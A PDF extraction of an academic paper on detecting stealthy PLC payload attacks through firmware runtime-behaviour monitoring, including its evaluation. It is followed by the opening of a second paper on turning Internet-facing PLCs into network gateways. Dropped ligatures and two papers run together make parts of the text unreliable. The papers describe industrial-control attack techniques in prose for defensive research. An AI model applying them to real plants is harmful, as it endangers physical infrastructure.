ICS components may be exploited to gain access to an engineering workstation, which allows he/she to download malicious payload. For example, in the Stuxnet attack [2], many potential attack vectors, including the PLC programming environment, are exploited to eventually compromise a PLC-connected engineering workstation. We assume that the attacker is not capable of changing the PLC rmware, which requires either attacking the cryp- tographically protected rmware image or loading modi ed rmware directly via JTAG interface. Therefore, rmware- level detection mechanism proposed in this paper is not tampered by the attacker. The goal of a payload attack is not limited to blocking legitimate outputs, causing system inter- ruption, and destruction of system equipment. Sophisticated attacks such as the PLC blaster worm [22] which replicates itself to other PLCs can also be launched. However, such attacks download a payload program that are signi cantly different from the legitimate version in terms of program size and functionality, which can be identi ed by human operator monitoring the control system. In this paper, we consider stealthy payload attacks that are modi ed from legitimate payload programs. Such attacks preserve certain legitimate payload properties (e.g., always sending sensor readings re- quested by HMI) while carrying out malicious tasks. B. 
PLC Program Development Process and Control System Speci cations To develop PLC payload program for an ICS, the following process is typically adopted by PLC engineers: 1) Speci cation Formulation. Control tasks to be carried out by a PLC are identi ed and input/output signals required by these tasks are de ned. The logical sequence of operations for the PLC are speci ed,2018 IEEE Conference on Communications and Network Security (CNS) Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:38:41 UTC from IEEE Xplore. Restrictions apply. e.g., in the form of sequence table, ow chart, or relay schematic [9]. 2) PLC Program Development. At this step, PLC pro- gram is developed based on the formulated speci - cations. Although an engineering team usually has its own set of guidelines and best practices on pro- gram organization and documentation, the generated PLC payload always aims to accurately implement the speci cations. At this stage, an attacker (e.g., a disgruntled control system engineer) may collect legitimate payload program and modify it to generate malicious payload. 3) Testing. Before deploying the PLC program, PLC engineers need to test the program via simulation or under some test environment. Safety properties (e.g., a circuit breaker must trip if a fault is detected) can be provided by system operators and/or iden- ti ed during speci cation formulation. In addition, different combinations of input values are fed to the PLC to ensure that correct responses are taken under different system operation scenarios. Although the test cases may not be exhaustive (e.g., it is hard to implement all test cases when analog inputs are used), important system properties, such as safety and real-time requirements, should always be validated. 4) Maintenance. After an initial version of the PLC control program is deployed, the ICS may go through hardware upgrades and design improvements. Ac- cordingly, the speci cations should be updated and the PLC program should be revised. After necessary testing, the new payload is downloaded to the PLC. In this paper, we assume that control system speci cations, such as the number of I/Os, functionality of each I/O pin, and possible ranges of I/O values, are available. Such speci ca- tions are usually provided by the control system engineering team that develops the legitimate payload program. Table I summarizes the control system speci cations required by our detection mechanism and the corresponding legitimate control system actions. For instance, when designing the legitimate payload, a digital output pin may be used to control a circuit breaker to trip. The engineering team knows whether a 0 or a 1 corresponds to the trip signal, so it is straight- forward to generate control system speci cations describing the functionality of this output pin. To implement control operation sequences (e.g., tripping a circuit breaker and then re-closing it), timers and counters are generally used. When the legitimate payload program is created, timers and counter must be properly con gured to control the temporal behaviors of the payload program. These con gurations can then be converted into timing relationships among I/O and network events. C. Payload Attack Detection at PLC Firmware Using control system speci cations, runtime behavior model of legitimate PLC payload program is established and stored in the PLC rmware. 
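No storage format is prescribed for these specifications; purely as an illustration, the specification categories of Table I might first be captured in a machine-readable form such as the C declarations below, which a firmware build step could then convert into the model described next. The structs, field names and example entries (loosely based on the circuit-breaker and battery-level examples used in the text) are assumptions.

#include <stdint.h>

typedef enum { PIN_DIGITAL_IN, PIN_DIGITAL_OUT,
               PIN_ANALOG_IN,  PIN_ANALOG_OUT } pin_kind_t;

typedef struct {
    const char *address;      /* hierarchical address, e.g. "I:0/0"           */
    pin_kind_t  kind;
    uint16_t    lo[2], hi[2]; /* up to two legitimate value ranges (raw units) */
    uint8_t     n_ranges;
} pin_spec_t;

typedef struct {
    const char *precondition; /* observed event, e.g. fault detected on input  */
    const char *action;       /* required response, e.g. energize trip coil    */
    uint32_t    deadline_us;  /* must occur within this many microseconds      */
} timing_spec_t;

static const pin_spec_t pin_specs[] = {
    /* digital pins: legitimate values 0 and 1                                 */
    { "I:0/0", PIN_DIGITAL_IN,  {0, 1},      {0, 1},      2 },  /* manual reset */
    { "O:2/8", PIN_DIGITAL_OUT, {0, 1},      {0, 1},      2 },  /* CB trip coil */
    /* analog battery input, in hundredths of a volt: 0-3 V and 12-15 V        */
    { "I:1.0", PIN_ANALOG_IN,   {0, 1200},   {300, 1500}, 2 },
};

static const timing_spec_t timing_specs[] = {
    { "voltage/current fault detected", "energize trip coils",   1000 },
    { "process data request received",  "send process data",      500 },
};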
The timing relationships between inputs and outputs, the number of network packets generated after different control actions, as well as timing relationships between I/O and network events, are modeled. By modifying the PLC rmware, runtime behaviors of the payload program ............ Digital input terminals Digital output terminalsAnalog input terminalsAnalog output terminalsI:0/0 HIGH LOWManual reset energized Manual reset de-energized O:2/8 HIGH LOWEnergize circuit breaker (CB) trip coil De-energize CB trip coilO:3.0 12~15VCharge actuator battery I:1.0 0~3VActuator battery needs to be charged 12~15VActuator battery level is normalNetwork Port Packet counts (sending) Packet counts (receiving)1, 3 1Fig. 5. PLC wiring diagram with sample control system speci cations for I/O and network events. Note that wiring of I/O terminals is simpli ed (digital ground terminal as well as terminal pairs for each analog I/O are not shown). (e.g., I/O and network access patterns) are time-stamped and compared against the established runtime behavior model. In addition, a backup version of the output image table is separately stored by the rmware at the beginning of each program scan cycle. If a certain abnormal runtime behavior is detected, the backup output image table is loaded to overwrite the output generated by the payload. As a result, any output related to the detected abnormal runtime behavior will not affect the physical system. For PLC payload sending/receiving network packets, network requests are also blocked when a runtime behavior anomaly is detected by the rmware. IV. S YSTEM DESIGN A. PLC Payload Runtime Behavior Model Given the control system speci cations, it is possible to create a runtime behavior model for legitimate PLC payload. Suppose that we need to create control system speci cations for the PLC shown in Fig. 5. In this gure, sample speci - cations for I/O terminals and the network port is provided. We note that timing relationships are not shown in Fig. 5. The information categorized in Table I allows us to create the runtime behavior model as follows: First, the number of (analog and digital) I/Os and their feasible values are determined. For instance, for digital input I:0/0 in Fig. 5, its legitimate values are 1 and 0 . For analog input I:1.0 (note that the notation for analog I/Os is different from that for digital I/Os as mentioned in Sec. II-B), the legitimate value ranges are 03V and 1215V . In the PLC rmware, such information can be stored as a table (see Fig. 6 for an example), with each row storing the legitimate values/ranges of a particular pin. We call this table the I/O event table. Next, the number of network packets received or sent by the legitimate payload is extracted from the speci cations. Since PLC payload program is designed to control physical process, network packets are typically associated to speci c I/O conditions. For instance, when an alarm signal is energized to sound a horn, the same alarm signal is usually transmitted via a network packet to the HMI at the same time. When a process data request from the HMI is received, the PLC generates process data response(s) to transmit the requested2018 IEEE Conference on Communications and Network Security (CNS) Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:38:41 UTC from IEEE Xplore. Restrictions apply. I/O Event Table I/O Event I:0/0 I:1.0 O:2/8 O:3.0... ... ... ...Legitimate Values/Ranges 1 (HIGH), 0 (LOW)... 
0:3 (0~3V), 12:15 (12~15V) 1 (HIGH), 0 (LOW)... 12:15 (12~15V)... ... Network Event Table Network EventLegitimate Packet Counts receiving sending1 1, 3Timing Behavior Matrix Fig. 6. A sample runtime behavior model established based on control system speci cations in Fig.5. The model consists of two tables and a sparse matrix. data. In the PLC rmware, network event information can be stored as a table with two rows (see Fig. 6 for an example). The rst row lists the numbers of network packets that can be received, and the second row lists those that can be sent. We call this table the network event table. Using the I/O and network event tables, we are able to model the legitimate runtime behaviors of I/Os and network port(s) at any particular time instant. Then, timing relationships between inputs, outputs, and network accesses are established. To store these relationships, a sparse matrix is created in the PLC rmware (see Fig. 6 for an example). We call this sparse matrix the timing be- havior matrix. Both the rows and the columns of the matrix are indexed by legitimate I/O and network operations. For instance, the I:0/0:1 event in the matrix in Fig. 6 represents the I/O event where digital input pin I:0/0 is set to HIGH. Each column of the matrix represents a particular payload program action, whereas the rows with non-zero values represent its preconditions. For instance, the matrix in Fig. 6 indicates that there are four preconditions under which a network packet will be generated and sent by a legitimate PLC payload. Note that the non-zero value in the matrix represent the maximum time (in microseconds) within which a column event will occur. Once all information provided in the control system spec- i cations is converted into a runtime behavior model, three tables are stored into the PLC rmware (i.e., the I/O event table, the network event table, and the timing behavior matrix). These tables will only be updated if changes to the control system speci cations are made (e.g., additions of new sen- sors/actuators). When a PLC payload is downloaded to a PLC, the PLC rmware assumes that its runtime behaviors match the ones speci ed in the supplied control system speci cations. Any deviation from the encoded runtime behavior model will be regarded as an anomaly. B. Payload Attack Detection at PLC Firmware Our detection scheme introduces runtime behavior moni- toring into the PLC rmware and compares the runtime be- haviors of the currently deployed payload against the runtime behavior model established from control system speci cations. To implement the proposed detection scheme, the following modi cations to the PLC rmware are incorporated: 1) Logging Access to Input and Output Images: As intro- duced in Sec. II-A, input image is updated before each run ofthe payload program, and output image is updated after each run. In existing PLC rmware, I/O reads move values from the input/output image to a designated memory location. When an output pin is written, value stored in a memory location is moved to the output image table. To receive/send a packet, receive/transmit queue is either explicitly (via ladder logic in- struction) or implicitly (at the end of the housekeeping phase) queried. To monitor the I/O and network access patterns, we modify the implementation of PLC rmware to log the system time-stamp of these operations. This can be achieved by setting up the memory protection unit (MPU) to enter interrupt when the user program accesses the input/output images or the network queues. 
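The exact firmware changes are not listed; the C sketch below, written against CMSIS-style register names for a Cortex-M4 class device, only illustrates the idea of combining an MPU region with a MemManage fault handler to time-stamp image-table accesses. The mpu_guard_region(), system_time_us() and log_io_event() helpers are assumptions, and the step that re-executes the intercepted access after logging is deliberately omitted.

#include <stdint.h>
#include "device.h"   /* assumed device header pulling in the CMSIS core (SCB, MPU) */

extern uint8_t  output_image[];                   /* region guarded by the MPU       */
extern uint32_t system_time_us(void);             /* assumed read of the system timer */
extern void     log_io_event(uint32_t offset, uint32_t t_us); /* appends to the       */
                                                  /* runtime time-stamp table         */

/* Assumed helper: configure one MPU region so that unprivileged (payload)
 * accesses to [base, base+size) raise a MemManage fault.                              */
void mpu_guard_region(void *base, uint32_t size);

void detection_init(void)
{
    mpu_guard_region(output_image, 256);
    SCB->SHCSR |= SCB_SHCSR_MEMFAULTENA_Msk;      /* enable the MemManage fault       */
}

void MemManage_Handler(void)
{
    /* MMFAR holds the faulting data address only while MMARVALID (bit 7 of the
     * MemManage fault status byte in CFSR) is set.                                   */
    if (SCB->CFSR & (1UL << 7)) {
        uint32_t offset = SCB->MMFAR - (uint32_t)output_image;
        log_io_event(offset, system_time_us());   /* time-stamp the I/O access        */
        SCB->CFSR = (1UL << 7);                   /* write-1-to-clear the fault status */
    }
    /* ...grant the intercepted access (e.g. briefly open the region) and return...   */
}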
In existing PLC rmware, a separate system timer is typically supported. This timer provides the time- stamps for the I/O and network events to be monitored. If I/O images are accessed, the interrupt handler decodes the I/O pin address and log the time-stamp of the operation. Suppose that the same input pin is accessed multiple times during a single program scan cycle, only the time-stamp of the rst read operation is logged. For an output pin, both the rst read and the last write operations are time-stamped. For access to network queues, the number of packets received/sent is logged and time-stamped. Time-stamps of I/O and network operations are stored in a separate table (known as the runtime time- stamp table) in the PLC rmware. Each entry of the table corresponds to a particular I/O event (e.g., a legitimate I/O value is observed) or network event (e.g., a legitimate number of packets are sent). In our current implementation, the maximum number of time-stamps logged by the runtime time-stamp table is 10 for each I/O event. If more than 10 time-stamps are collected, newly generated time-stamps will be discarded. We log the time-stamp for the rst I/O read operation and last output operation within each program scan cycle because control system speci cations typically use the observation of an I/O value on the physical process as precondition. Take the output pin O:2/8 in Fig. 5 as an example. Even if the payload program operates on O:2/8 multiple times during a program scan cycle, it is the last value written into the output image that will actually take effect. For each legitimate network event, our current implementation logs a maximum of 20 time-stamps. Newly collected time-stamps will be discarded if there are already 20 time-stamps pending in the table. 2) Validating Runtime Behaviors: When time-stamping I/O and network events, any event that is not included in the I/O and network event tables is regarded as an abnormal runtime event. In addition, a separate sparse matrix (known as the runtime sparse matrix ) is created and maintained in the PLC rmware to keep track of the timing relationships at runtime. The sparse matrix is also updated in the MPU interrupt handler. Runtime behaviors speci ed in the timing behavior matrix are validated in the output scan phase before the values in the output image are transferred to external output terminals. If any of the preconditions speci ed by the runtime behavior model are met, the timing relationships are checked. If an event occurs but none of its preconditions are active, a runtime behavior anomaly is detected. Take the timing behavior matrix in Fig. 6 as an example. Suppose that during a program scan cycle, we observe two occurrences of the event2018 IEEE Conference on Communications and Network Security (CNS) Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:38:41 UTC from IEEE Xplore. Restrictions apply. Send:1 . For the rst time-stamp of Send:1 , we check the all the time-stamps for its preconditions. If any of the timing relationships is met, the corresponding entry in the runtime sparse matrix is cleared. In the runtime time-stamp table, the oldest time-stamp for the corresponding precondition event is removed. If a violation of the timing relationship is detected, a runtime behavior anomaly is found and the execution of the payload program should be terminated. 
Then, for the second time-stamp of Send:1 , previously cleared precondition elds are set if the corresponding entries in runtime time-stamp table have pending time-stamps. The timing relationships for Send:1 are then validated again. 3) Backing Up the Output Image: At the beginning of each program scan cycle (i.e., in the input scan phase), a backup version of the output image table is separately stored by the PLC rmware. Values in this backup image are simply the output of the preceding program scan cycle. If runtime behavior anomaly is detected at the current program scan cycle, the backup image is used to overwrite the output image generated by the payload program. In this way, output values corresponding to illegitimate payload program behaviors are blocked. 4) Canceling Network Send/Receive Requests: There are two scenarios where network send/receive requests gener- ated by ladder logic instructions are processed: Network send/receive requests generated by a payload program are always processed in the housekeeping phase. To block these packets, we modify the rmware so that all pending network requests are cleared in the output scan phase if runtime be- havior anomaly is detected. Alternatively, a subset of network- related ladder logic instructions can request the PLC rmware to service pending network tasks immediately. To prevent such network access, the implementation of MPU interrupt handler is further modi ed to check the preconditions of requested network operations. Suppose that a network-related ladder logic instruction is executed, after the network requests are generated (e.g., four packets will be retrieved from the receive queue), the rmware rst enters the MPU interrupt handler and checks the preconditions of the requested network event. If any of the preconditions is met yet the corresponding timing relationship is violated, the network requests will not be executed because a runtime behavior anomaly is detected. It should be noted that our proposed detection scheme can easily be customized to notify ICS operators of the detection 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 Number of analog outputs0510152025303540Maximum memory size (kB)unmodified firmware modified firmware Fig. 7. Maximum memory utilization of unmodi ed and modi ed PLC rmware running PLC payload programs with different numbers of utilized analog outputs.of PLC payload attacks. Suppose an on-site operator is to be noti ed, an extra output pin can be energized to set up an alarm during the output scan phase when runtime behaviors are examined. It is also possible to send out an alarm message to a remote HMI during this phase after the runtime behavior validation is done. V. E VALUATION We implement the proposed payload attack detection method on Texas Instruments TM4C12x ARMR CortexR - M4F core-based microcontrollers. Payload attacks are written in ladder logic, which are converted into machine code and loaded onto the PLC prototype. Hardware resources of the chosen microcontroller series are the currently active equiv- alents to the microcontrollers used by existing PLCs [6]. Memory protection unit (MPU) and system timer are avail- able to implement our proposed detection scheme. Runtime behavior data collected by the PLC rmware is read from a Universal Asynchronous Receiver/Transmitter (UART) mod- ule connected to a PC. We rst evaluate the overhead of implementing the proposed detection mechanism and then its detection performance. A. 
Memory Overhead Memory overhead of implementing the proposed detection method comes from both the rmware and payload levels. In the PLC rmware, runtime behavior model converted from control system speci cations needs to be stored. Extra tables and sparse matrix are required to time-stamp and keep track of the runtime behaviors of the currently deployed payload. The sizes of these matrices and tables will grow as the number of I/O and network events speci ed in the control system speci cations grows. In addition, interrupt handler for the MPU as well as initialization code for the system timer and MPU need to be added to the PLC rmware. In our prototype, these rmware modi cations translate to about 200 lines of assembly code (compared to the unmodi ed PLC rmware with about 6000 lines of assembly code). To evaluate whether the memory overhead of our pro- posed detection mechanism is acceptable, we create payload programs utilizing different numbers of I/Os and generating different numbers of network packets. Note that each of these payload programs generates two types of network events (i.e., 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 Number of analog outputs05001000150020002500300035004000Maximum execution time ( s)unmodified firmware modified firmware Fig. 8. Maximum execution time of PLC programs with different numbers of utilized analog outputs. All payload programs are executed on both unmodi ed and modi ed PLC rmware.2018 IEEE Conference on Communications and Network Security (CNS) Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:38:41 UTC from IEEE Xplore. Restrictions apply. Medium- or High-Voltage Bus Voltage and Current Sensors Circuit Breaker (CB) Primary Transformer Load 1Load 2Load 3Primary Transformer Protection PLC Feeder #1 Protection PLCFeeder #2 Protection PLCFeeder #3 Protection PLCPLC AFig. 9. Sample power substation protection system implemented by multiple PLCs. Note that our PLC prototype only emulates PLC A. sending two packets or receiving one packet within each pro- gram scan cycle) and utilizes 16 digital I/Os. The number of analog outputs utilized by these payload programs varies from 0 to 16. Each analog output has two legitimate value ranges. The timing relationships in the control system speci cations all describe preconditions for analog outputs. These payload programs are then loaded onto our PLC prototype twice: First, unmodi ed PLC rmware is used to execute the payload programs and the maximum sizes of the PLC rmware in the RAM are logged. Then, PLC rmware with our payload detection mechanism is used and the maximum rmware sizes are also recorded. Fig. 7 shows the memory overhead of implementing our PLC payload attack detection method in our PLC prototype. For a PLC system with 16 analog outputs, the memory overhead (compared to unmodi ed PLC rmware) is about 1 kB, which translates to a 3% increase in memory size. This memory overhead is acceptable for existing PLC systems on the market, which typically have more than 32 kB of memory [9]. B. Execution Time Overhead PLC payload program needs to satisfy execution time requirements in order to control physical process correctly. If a program scan cycle takes too long to complete, the PLC will not be able to track the changes of the physical process and generate control outputs timely. 
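Scan-cycle time can also be bounded on-chip; as a minimal sketch (not the pin-toggling measurement method used in the evaluation below), the Cortex-M4F cycle counter could be read around one scan cycle. CMSIS register names are assumed to be provided by the device header, and the 80 MHz clock is an assumption.

#include <stdint.h>
#include "device.h"               /* assumed device header with the CMSIS core */

#define CPU_HZ 80000000u          /* e.g. 80 MHz TM4C system clock (assumption) */

static inline void cycle_counter_init(void)
{
    CoreDebug->DEMCR |= CoreDebug_DEMCR_TRCENA_Msk;  /* enable the DWT unit     */
    DWT->CYCCNT = 0;
    DWT->CTRL  |= DWT_CTRL_CYCCNTENA_Msk;            /* start the cycle counter */
}

/* Measure one program scan cycle (input scan .. housekeeping), in microseconds. */
static inline uint32_t scan_cycle_us(void (*run_scan_cycle)(void))
{
    uint32_t start = DWT->CYCCNT;
    run_scan_cycle();
    return (DWT->CYCCNT - start) / (CPU_HZ / 1000000u);
}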
Since our payload detec- tion mechanism incorporates runtime behavior monitoring and validations in the PLC rmware, it is necessary the ensure that execution time of the program scan cycle does not signi cantly increase. TABLE II. A TTACK INSTANCES IMPLEMENTED ON PLC P ROTOTYPE Attack Instance Group Description Illegitimate analog in- puts (Group 1, 5 in- stances)Scaling factors of analog input modules are modi ed by attacker(s) to generate out-of-range input values. Illegitimate network events (Group 2, 5 instances)When trip coils are energized, the attack payload sends process data to multiple pre-speci ed destina- tions. When process data request is received, a packet containing intentionally modi ed process data is sent. Illegitimate I/O event timing (Group 3, 5 in- stances)Trip coils are not energized within 1000 s when a voltage/current fault is detected. Illegitimate network event timing (Group 4, 5 instances)Packet containing up-to-date process data is not sent within 500 s after process data request is received.TABLE III. A TTACK INSTANCES AND DETECTION RESULTS Group/ID 1 2 3 4 5 6 7 8 9 10 1/1 XXXXXXXXXX 1/2 XXXXXXXXXX 1/3 XXXXXXXXXX 1/4 XXXXXXXXXX 1/5 XXXXXXXXXX 2/1 XXXXXXXXXX 2/2 XXXXXX 2/3 XXXXXXXXXX 2/4 XXXXXXXXXX 2/5 XXXXXXXXXX 3/1 XXXXXXXXXX 3/2 XXXXXXXXXX 3/3 XXXXXXXXXX 3/4 XXXXXXXXXX 3/5 XXXXXXXXXX 4/1 XXXXXXXXXX 4/2 XXXXXXXXXX 4/3 XXXXXXXXXX 4/4 XXXXXXXXXX 4/5 XXXXXXXXXX To evaluate the execution time overhead of the proposed detection mechanism, we measure the execution time of the payload program instances created in Sec. V-A. Each payload program are executed for 1,000 program scan cycles on both unmodi ed and modi ed PLC rmware. Note that we added six extra assembly instructions in the PLC rmware to set up an extra output pin of the prototype PLC: At the beginning of each program scan cycle, this pin is set to HIGH. At the end of each program scan cycle, this pin is set to LOW. Fig. 8 shows the maximum execution time of the payload program instances. The average increase in maximum execution time is about 65 s, which is far above the typical execution time of PLC payload programs (e.g., 110 ms [9]). C. Detection Performance To evaluate the detection performance of our proposed method, our PLC prototype emulates PLC A shown in Fig. 9. To implement the protection tasks assumed by PLC A, four analog inputs and two digital outputs are utilized. Our control system speci cations require that both circuit breakers are tripped within 1000 s once a voltage/current fault is detected on either side of the transformer. In addition, when process data request (sent by a PC emulating an HMI) is received, a packet containing up-to-date current and voltage readings must be sent within 500 s. We create 20 different payload attack instances, which can be categorized into the four groups and are described in Table II. Each payload attack instance is executed for 10 times (each run consisting of 1,000 program scan cycles). Table III shows the detection results when running the payload attacks on the modi ed PLC rmware. 19 out of the 20 payload attack instances can always be detected during our evaluation, which shows that our proposed detection mechanism can help prevent PLC payload attacks without introducing external apparatus. One of the attack instances (Group 2, Instance 2) cannot always be detected. This attack instance either generates ille- gitimate outputs or transmits modi ed process data as network packets. 
When this instance sends network packets, it simply modifies the process data values stored in memory before they are encapsulated. The preconditions of network events are still met and the timing relationships are not violated. Although this attack instance can sometimes evade our detection, it can be easily identified by existing detection methods against false data injection attacks [23].

VI. DISCUSSION

In this paper, we propose incorporating runtime behavior monitoring and establishing runtime behavior models from control system specifications to detect PLC payload attacks. Although our evaluations show that it is feasible to implement our proposed method in existing PLC firmware and achieve good detection performance, we note that further enhancements to the proposed method are possible. For instance, it is possible to encode correlations between I/O events at certain time instants during the program scan cycle (e.g., by identifying legitimate I/O combinations in the runtime behavior model). However, such an enhancement will require overly detailed control system specifications. Control system engineers may not be aware of all the legitimate I/O combinations when creating the PLC payload program. Furthermore, the memory and execution time overhead of such an enhancement will also increase. Therefore, it remains to be further evaluated whether other runtime behavior specifications should be included in our model.

Our current implementation focuses on payload attack detection instead of mitigation. Although outputs and network packets related to abnormal control logic are blocked, the operations of the ICS may still be affected. As future work, we will devise better mitigation strategies for ICS with different mitigation resources.

VII. CONCLUSION

In this paper, we propose the detection of PLC payload attacks via runtime behavior monitoring in PLC firmware. Through modeling and monitoring the runtime behaviors, our proposed firmware enhancements can detect abnormal runtime behaviors of malicious payload. Using our proof-of-concept PLC prototype, we show that the proposed approach can identify a wide variety of PLC payload attacks revealed by prior research. In addition, our evaluations show that the execution time and memory overhead of the proposed detection mechanism are acceptable for existing PLC firmware. Our proposed approach complements existing bump-in-the-wire solutions in that it can detect payload attacks that violate real-time requirements of ICS operations.

ACKNOWLEDGMENT

This work is supported by the U.S. Department of Energy (DoE) under Award Number DE-OE0000779.

REFERENCES
[1] E. R. Alphonsus and M. O. Abdullah, "A Review on the Applications of Programmable Logic Controllers (PLCs)," Renewable and Sustainable Energy Reviews, vol. 60, pp. 1185-1205, July 2016.
[2] D. Kushner, "The Real Story of Stuxnet," IEEE Spectrum, vol. 50, no. 3, pp. 48-53, March 2013.
[3] N. Falliere, L. O. Murchu, and E. Chien, "W32.Stuxnet Dossier," White Paper, Symantec Corp., Security Response, vol. 5, no. 6, 2011.
[4] N. Govil, A. Agrawal, and N. O. Tippenhauer, "On Ladder Logic Bombs in Industrial Control Systems," arXiv:1702.05241 [cs.CR], February 2017.
[5] S. McLaughlin and P. McDaniel, "SABOT: Specification-Based Payload Generation for Programmable Logic Controllers," in Proceedings of the 2012 ACM Conference on Computer and Communications Security (CCS '12), 2012, pp. 439-449.
[6] L. Garcia and S. A. Zonouz, "Hey, My Malware Knows Physics! Attacking PLCs with Physical Model Aware Rootkit," in Proceedings of the 2017 Network and Distributed System Security Symposium (NDSS '17), 2017.
[7] A. Rullán, "Programmable Logic Controllers versus Personal Computers for Process Control," Computers & Industrial Engineering, vol. 33, no. 1, pp. 421-424, October 1997.
[8] "Programmable Controllers - Part 3: Programming Languages," International Electrotechnical Commission (IEC), International Standard, February 2013.
[9] F. Petruzella, Programmable Logic Controllers, 5th ed. New York, NY, USA: McGraw-Hill Education, 2017.
[10] A. Abbasi and M. Hashemi, "Ghost in the PLC: Designing an Undetectable Programmable Logic Controller Rootkit via Pin Control Attack," in Black Hat Europe '16, November 2016, pp. 1-35.
[11] L. Cojocar, K. Razavi, and H. Bos, "Off-the-Shelf Embedded Devices as Platforms for Security Research," in Proceedings of the 10th European Workshop on Systems Security (EuroSec '17), April 2017, pp. 1:1-1:6.
[12] J. O. Malchow, D. Marzin, J. Klick, R. Kovacs, and V. Roth, "PLC Guard: A Practical Defense against Attacks on Cyber-Physical Systems," in 2015 IEEE Conference on Communications and Network Security (CNS), September 2015, pp. 326-334.
[13] H. Janicke, A. Nicholson, S. Webber, and A. Cau, "Runtime-Monitoring for Industrial Control Systems," Electronics, vol. 4, no. 4, pp. 995-1017, December 2015.
[14] S. E. McLaughlin, S. A. Zonouz, D. J. Pohly, and P. D. McDaniel, "A Trusted Safety Verifier for Process Controller Code," in Proceedings of the 2014 Network and Distributed System Security Symposium (NDSS '14), 2014.
[15] S. Zonouz, J. Rrushi, and S. McLaughlin, "Detecting Industrial Control Malware Using Automated PLC Code Analytics," IEEE Security & Privacy, vol. 12, no. 6, pp. 40-47, November 2014.
[16] O. Rossi and P. Schnoebelen, "Formal Modeling of Timed Function Blocks for the Automatic Verification of Ladder Diagram Programs," in Proceedings of the 4th International Conference on Automation of Mixed Processes - Hybrid Dynamic Systems (ADPM 2000), 2000, pp. 177-182.
[17] N. Delgado, A. Q. Gates, and S. Roach, "A Taxonomy and Catalog of Runtime Software-Fault Monitoring Tools," IEEE Transactions on Software Engineering, vol. 30, no. 12, pp. 859-872, December 2004.
[18] Y. Ye, T. Li, D. Adjeroh, and S. S. Iyengar, "A Survey on Malware Detection Using Data Mining Techniques," ACM Computing Surveys, vol. 50, no. 3, pp. 41:1-41:40, October 2017.
[19] S. Lu, M. Seo, and R. Lysecky, "Timing-Based Anomaly Detection in Embedded Systems," in The 20th Asia and South Pacific Design Automation Conference, January 2015, pp. 809-814.
[20] S. Dunlap, J. Butts, J. Lopez, M. Rice, and B. Mullins, "Using Timing-Based Side Channels for Anomaly Detection in Industrial Control Systems," International Journal of Critical Infrastructure Protection, vol. 15, pp. 12-26, 2016.
[21] X. Wang, C. Konstantinou, M. Maniatakos, R. Karri, S. Lee, P. Robison, P. Stergiou, and S. Kim, "Malicious Firmware Detection with Hardware Performance Counters," IEEE Transactions on Multi-Scale Computing Systems, vol. 2, no. 3, pp. 160-173, July 2016.
[22] R. Spenneberg, M. Brüggemann, and H. Schwartke, "PLC-Blaster: A Worm Living Solely in the PLC," in Black Hat Asia '16, 2016.
[23] R. Deng, G. Xiao, R. Lu, H. Liang, and A. V. Vasilakos, "False Data Injection on State Estimation in Power Systems - Attacks, Impacts, and Defense: A Survey," IEEE Transactions on Industrial Informatics, vol. 13, no. 2, pp. 411-423, April 2017.
Detecting Payload Attacks on Programmable Logic Controllers (PLCs)
Huan Yang, Liang Cheng, and Mooi Choo Chuah
Department of Computer Science and Engineering, Lehigh University, Bethlehem, Pennsylvania 18015
E-mail: [email protected], [email protected], [email protected]
Internet-facing_PLCs_as_a_network_backdoor.pdf
Industrial control systems (ICS) are integral com ponents of production and control processes. Our modern infras tructure heavily relies on them. Unfortunately, from a security perspective, thousands of PLCs are deployed in an Internet-facing fashion. Security features are largely absent in PLCs. If they are present then they are often ignored or disabled because security is often at odds with operations. As a consequence, it is often possible to load arbitrary code onto an Internet-facing PLC. Besides being a grave problem in its own right, it is possible to leverage PLCs as network gateways into production networks and perhaps even the corporate IT network. In this paper, we analyze and discuss this threat vector and we demonstrate that exploiting it is feasible. For demonstration purposes, we developed a prototypical port scanner and a SOCKS proxy that runs in a PLC. The scanner and proxy are written in the PLC's native programming language, the Statement List (STL). Our implementation yields insights into what kinds of actions adversaries can perform easily and which actions are not easily implemented on a PLC. I. INTRO DUCT ION Industrial control systems (ICS) are integral components of production and control tasks. Modern infrastructure heavily relies on them. The introduction of the Smart Manufacturing (Industry 4.0) technology stack further increases the dependency on industrial control systems [1]. Modern infrastructure is already under attack and offers a broad attack surface, ranging from simple XSS vulnerabilities [2], [3] to major design flaws in protocols [4], [5]. The canonical example of an attack on an industrial control system is the infamous Stuxnet worm that targeted an Iranian uranium enrichment facility. However, adversaries increasingly target ordinary production systems [6]. A recent example is the forced shutdown of a blast furnace in a German steelworks in 2014. The attackers reportedly gained access to the pertinent control systems via the steelwork's business network [7]. This is a typical attack vector because business networks serve humans and humans are susceptible to spear phishing. Arguably , spear phishing is easy to carry out when ac companied with research and social engineering. However, in far too many cases, even easier ways exist into industrial control systems. Published scan data shows that thousands of ICS components, for example, programmable logic controllers (PLCs), are directly reachable from the Internet [8], [9], [10]. While only one PLC of a production facility may be reachable in this fashion, the PLC may connect to internal networks with many more PLCs. This is what we call the "deep" industrial network. In this paper, we investigate how adversaries can leverage exposed PLCs to extend their access from the Internet to the deep industrial network. 978-1-4673-7876-5/15/$31.00 2015 IEEE 524 The approach we take is to turn PLCs into gateways (we focus on Siemens PLCs). This is enabled by a notorious lack of proper means of authentication in PLCs. A knowledgeable adversary with access to a PLC can download and upload code to it, as long as the code consists of MC7 bytecode, which is the native form of PLC code. We explored the runtime environment of PLCs and found that it is possible to implement several network services using uploaded MC7 code. In particular, we implemented a SNMP scanner for Siemens PLCs, and a fully fledged SOCKS proxy for Siemens PLCs entirely in Statement List (STL), which compiles to MC7 byte code. 
